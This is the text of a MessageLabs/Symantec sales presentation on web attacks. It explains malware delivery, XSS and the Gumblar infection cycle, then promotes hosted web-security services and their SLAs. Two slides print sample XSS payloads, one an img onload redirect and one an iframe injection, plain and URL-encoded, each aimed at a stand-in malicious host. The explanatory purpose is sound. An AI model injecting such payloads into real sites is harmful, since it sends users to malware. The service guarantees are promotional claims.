This document discusses common web attacks that companies face and how to protect against them. It outlines how malware spreads through bad links, advertising, and cross-site scripting (XSS) attacks. XSS can be used to redirect users to malicious sites or install malware through iframes. Up to 60% of malicious web traffic involves "Gumblar" attacks, which install malware to steal user credentials and data. The document recommends controlling web access through policy, monitoring usage, and using malware protection and a hosted security service for the best protection. It highlights the services, infrastructure, service level agreements and shared intelligence of MessageLabs to protect against web threats.

1. Anatomy of a Web Attack 1

2. Agenda Challenges Corporation Face Web Usage Statistics Web Attacks Solving the Problem MessageLabs Services

3. The Challenge The Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats: Productivity Offensive Materials Abuse of resources Malware

4. Lots of websites Average 2,465 new malware websites per day.

6. Steal your credentials - bank theft / fraud

8. Getting Web Malware Bad Link postcard.jpg.exe

9. Advertise It Subvert a legitimate website Adverts

10. Fake AV Advert

11. XSS Attack User content No. Your wrong. Duh! Its “you’re”. I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”>

12. XSS IFrame Attack http://genuine/index.php?search="'> <iframe src="http://malicious“ height=“100%" width=“100%"> </iframe> http://genuine/index.php?search="'> %3C%69%66%72%61%6D%65%20 %73%72%63%3D%22%68%74%74 %70%3A%2F%2F%6D%61%6C%69 %63%69%6F%75%73%201C%20 %0A%68%65%69%67%68%74%3D %201C%31%30%30%25%22%20 %77%69%64%74%68%3D%201C %31%30%30%25%22%3E%0A%3C %2F%69%66%72%61%6D%65%3E%0A

13. Web Malware Malware Malicious instructions Browser / JS / Flash / PDF Complete control Victim Bad Guy

14. Gumblar Lifecycle User visits website with XSS exploit User is forwarded to host serving malware Malware installed (often flash or PDF) Malware steals website logins, forwards to hacker Hacker logs into website, installs XSS exploit

15. Gumblar Prevalance Up to 60% of all malicious web traffic is Gumblar.

16. How You Can Protect Yourself 15

17. Controlling the web IT Management should first consider controlling the Web; Policy engine includes: Categorised URL database MIME and file type lists Time periods User and group based policies Customizable block messages Controls HTTP and HTTPS

18. Building the policy No access to travel, leisure and sport between 9am and 5pm No access to sex, guns or drugs No access to streaming audio and video (reduce bandwidth) Only support can download executables

19. Monitoring access Dashboard – 1 year of high level information Detailed reports up to 6 months of URL and Malware information Customizable reports in PDF format Scheduled reports sent directly to your inbox

20. Malware Protection Scans HTTP and FTP/HTTP traffic Multiple signature based AV engines Skeptic technology Customizable block messages Converged analysis No noticeable latency

21. You have choices for Web Security 20

22. Why use a hosted services over hardware or software?

23. Why use MessageLabs Services? Best Client and Technical Support Global Support is 24/7/365 & included with the service Support SLA protects your business Always get a live person who speaks your language Dedicated CSM team Best Services Awarding Winning Analyst approved Backed by strongest SLAs

24. Most Robust Global Infrastructure Incorporating 14 data centers spanning four continents Every data center is scalable and secured to the highest standards Clustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated 23

25. Best Service Level Agreements Web Anti-Virus Protection  100% protection from known and unknown email viruses Credit is offered if a client infected by a virus Anti-Virus Protection  100% protection against known viruses Credit is offered if a client infected by a virus Email Archiving Latency  Average scanning time of 100% of web content is within 100 milliseconds Credit is offered if latency exceeds 100 milliseconds Virus False Positives  0.0001% FP capture rate Credit is offered if we do not meet this commitment Service Availability  100% uptime Credit is offered if availability falls below 100% Client may terminate if availability falls below 95% Spam Capture Rate  99% capture rate (95% for emails containing Asian characters) Credit is offered if we do not meet this commitment Support Service Availability Guarantee 99.9% uptime for archiving network Client may terminate if availability falls below 90% Spam False Positives  0.0003% FP capture rate Credit is offered if we do not meet this commitment Appliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost Latency  Average roundtrip time of 100% of email delivered in less than 60 seconds Credit is offered if latency exceeds 1 minute Delivery  100% delivery guarantee Client may terminate if we do not meet this Technical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs Credit is offered if we do not meet this commitment Service Availability  100% uptime Credit is offered if availability falls below 100% Client may terminate if availability falls below 95%

26. Best Shared Intelligence Accuracy, Reliability & Performance The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.

27. Q&A Visit: www.MessageLabs.com Phone: 866.460.0000 Email: Lrothman@MessageLabs.com 26

28. Special Thanks 27 Martin Lee MIET CISSP Research & Response Team Symantec Hosted Services